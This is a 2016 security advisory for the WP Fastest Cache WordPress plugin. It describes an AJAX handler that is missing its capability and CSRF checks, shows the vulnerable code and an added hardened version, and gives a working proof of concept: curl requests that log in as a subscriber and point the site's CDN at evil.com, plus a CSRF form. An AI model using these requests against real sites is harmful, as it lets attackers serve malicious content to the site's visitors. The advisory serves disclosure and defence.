WP Fastest Cache [Unauthorized Options Update]
Description
The WP Fastest Cache plugin registers the AJAX action
wpfc_save_cdn_integration_ajax_request
so that administrators can conveniently save their CDN integration options.
The action is handled by the wpfc_save_cdn_integration_ajax_request_callback()
function, which performs neither a capability check nor a CSRF (nonce) check.
Any registered user (a subscriber account is enough, as the PoC below shows) can
therefore update these options, and a malicious site can achieve the same
through a CSRF attack riding on a logged-in user's browser.
By overriding the CDN preferences an attacker can redirect all requests for CSS files, images, videos, etc. to a host they control, allowing them to serve malicious content to users of the vulnerable site.
Vulnerable code (file: wp-fastest-cache/wpFastestCache.php):

    public function wpfc_save_cdn_integration_ajax_request_callback(){
        // No check_ajax_referer() / nonce check and no current_user_can()
        // check: anyone who can reach admin-ajax.php as a logged-in user,
        // or who can make such a user's browser submit the request, gets here.
        // $_POST["values"] is stored unvalidated as the CDN configuration.
        $values = json_encode($_POST["values"]);
        if(get_option("WpFastestCacheCDN")){
            update_option("WpFastestCacheCDN", $values);
        }else{
            add_option("WpFastestCacheCDN", $values, null, "yes");
        }
        echo json_encode(array("success" => true));
        exit;
    }
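For comparison, a hardened version of the same callback, added here as an illustration and not code from the plugin or its vendor. It assumes a nonce action name of wpfc_cdn_save, a nonce field named _wpnonce and the manage_options capability (all my choices), and that the admin-side script sending the request has been given the nonce via wp_create_nonce('wpfc_cdn_save').

```php
<?php
// Added example: hardened replacement for the vulnerable callback.
// Assumed names (not from the plugin): nonce action "wpfc_cdn_save",
// nonce field "_wpnonce", required capability "manage_options".

// Only the logged-in hook is registered; without a wp_ajax_nopriv_ hook
// anonymous requests are rejected by admin-ajax.php itself.
add_action('wp_ajax_wpfc_save_cdn_integration_ajax_request',
           'wpfc_hardened_save_cdn_callback');

function wpfc_hardened_save_cdn_callback() {
    // CSRF defence: nonce bound to the current user and this action.
    // check_ajax_referer() terminates the request (HTTP 403) on failure.
    check_ajax_referer('wpfc_cdn_save', '_wpnonce');

    // Authorisation: a subscriber must not be able to rewrite site options.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'insufficient privileges'), 403);
    }

    // Input validation: whitelist keys and sanitise each value instead of
    // storing whatever arrives in $_POST['values'].
    $in = (isset($_POST['values']) && is_array($_POST['values']))
        ? wp_unslash($_POST['values']) : array();

    $cdnurl    = esc_url_raw($in['cdnurl']    ?? '', array('http', 'https'));
    $originurl = esc_url_raw($in['originurl'] ?? '', array('http', 'https'));
    if ($cdnurl === '' || $originurl === '') {
        wp_send_json_error(array('message' => 'invalid URL'), 400);
    }

    $allowed_types = array('css', 'js', 'gif', 'png', 'jpg', 'jpeg', 'ttf',
                           'otf', 'woff', 'less', 'mp4', 'svg', 'eot');
    $types = array_map('sanitize_text_field',
                       explode(',', (string) ($in['file_types'] ?? '')));
    $types = array_values(array_intersect($types, $allowed_types));

    $values = array(
        'id'         => sanitize_key($in['id'] ?? 'other'),
        'cdnurl'     => $cdnurl,
        'originurl'  => $originurl,
        'file_types' => implode(',', $types),
    );

    // update_option() creates the option when it does not exist yet,
    // so the get_option()/add_option() branch of the original is unnecessary.
    update_option('WpFastestCacheCDN', wp_json_encode($values));
    wp_send_json_success($values);
}
```

With these checks in place the authenticated curl request below fails the capability check and the CSRF form fails the nonce check, and neither can store an attacker-chosen CDN URL.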
PoC

Authenticated (any registered user; the original used `&`, which would run the second
request before the cookie file is written, so the commands are chained with `&&`):

    curl -XPOST 'http://sbwp1.dev/wp-login.php' \
        -d 'log=subscriber&pwd=password&wp-submit=Log+In' \
        -c '/tmp/Pan' \
    && curl -XPOST 'http://sbwp1.dev/wp-admin/admin-ajax.php' \
        -d 'action=wpfc_save_cdn_integration_ajax_request&values%5Bsuccess%5D=false&values%5Bid%5D=other&values%5Bcdnurl%5D=http%3A%2F%2Fevil.com&values%5Boriginurl%5D=http%3A%2F%2Fvuln.com&values%5Bfile_types%5D=css%2Cjs%2Cgif%2Cpng%2Cjpg%2Cjpeg%2Cttf%2Cotf%2Cwoff%2Cless%2Cmp4%2Csvg%2Ceot&file_types=css%2Cjs%2Cgif%2Cpng%2Cjpg%2Cjpeg%2Cttf%2Cotf%2Cwoff%2Cless%2Cmp4%2Csvg%2Ceot' \
        -b '/tmp/Pan'
CSRF

    <form action="http://sbwp1.dev/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="wpfc_save_cdn_integration_ajax_request" />
        <input name="values[id]" type="hidden" value="other" />
        <input name="values[cdnurl]" type="hidden" value="cdnurl.com" />
        <input name="values[originurl]" type="hidden" value="originurl.com" />
        <input name="values[success]" type="hidden" value="true" />
        <input name="values[file_types]" type="hidden" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" />
        <input type="submit" value="Submit form" />
    </form>
INFO
- Date: 26 April 2016
- Author: Pan Vag
- Vendor: www.wpfastestcache.com
- Plugin page: wordpress.org
- Plugin version: 0.8.5.6
- WordPress version: WordPress 4.5
- Reference: DWF-2016-87029